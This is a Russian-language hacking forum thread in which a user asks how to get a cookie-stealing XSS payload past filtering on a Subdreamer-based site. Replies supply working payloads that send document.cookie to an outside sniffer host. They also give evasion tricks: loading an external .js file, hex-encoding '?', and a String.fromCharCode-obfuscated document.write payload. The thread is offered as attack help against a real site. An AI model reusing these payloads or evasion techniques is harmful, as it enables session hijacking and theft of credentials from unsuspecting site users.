![]() |
Вопрос по Xss
Нашел на сайте XSS, однако при подстановке
>"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> как будто бы обрезается все, что находится после ? и получается следующее: <link>http://www......ru/<script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg</link> Как решить эту проблему? Сайт стоит на Subdreamer. |
Цитата:
P.S В последних версиях CMS стоит фильтрация +document.cookie P.S.S Сделай сылку на .js фаил и туда запихни PHP код:
|
не надо не чего скачивать все проги имеют свой алгоритм..лишь твоя голова имеет конструктор алгоритмов.
Ты не написал это активная или пассивная XSS 1) Если активная блин то скорее всего есть проверка на конец строки чтобы было расширение тогда попробуй >"><script>img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script> /1.jpg и вообще это тупо...юзай готовые тэги и их динамические параметры или высший пилотаж в активных XSS енто вложенные тэги. Если ты указал пассивную XSS тогда скорее всего идёт проверка на длину строки переменной. больше симолов н е чем отведенно под неё не вставишь. Поэтому лучший тут выход будет юзать скрипт с другого ресурса. к примеру вставить: <script src=http://qwe.ru/1.js></script> а на сайте http://qwe.ru/ в 1.js вставить скрипт передачи кукисов: img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg?"+document.cookie; |
Цитата:
PHP код:
|
Цитата:
Цитата:
XSS пассивная. |
Если фильтруется символ ? зашифруй его в HEX
img = new Image();img.src="http://antichat.ru/cgi-bin/s.jpg\x3F"+document.cookie; |
1.js
кидай псевдо-дефейс на снифф document.write(String.fromCharCode(60,115,99,114,1 05,112,116,62,105,109,103,32,61,32,110,101,119,32, 73,109,97,103,101,40,41,59,105,109,103,46,115,114, 99,61,34,104,116,116,112,58,47,47,97,110,116,105,9 9,104,97,116,46,114,117,47,99,103,105,45,98,105,11 0,47,115,46,106,112,103,63,34,43,100,111,99,117,10 9,101,110,116,46,99,111,111,107,105,101,59,32,60,4 7,115,99,114,105,112,116,62)) |
| Время: 02:29 |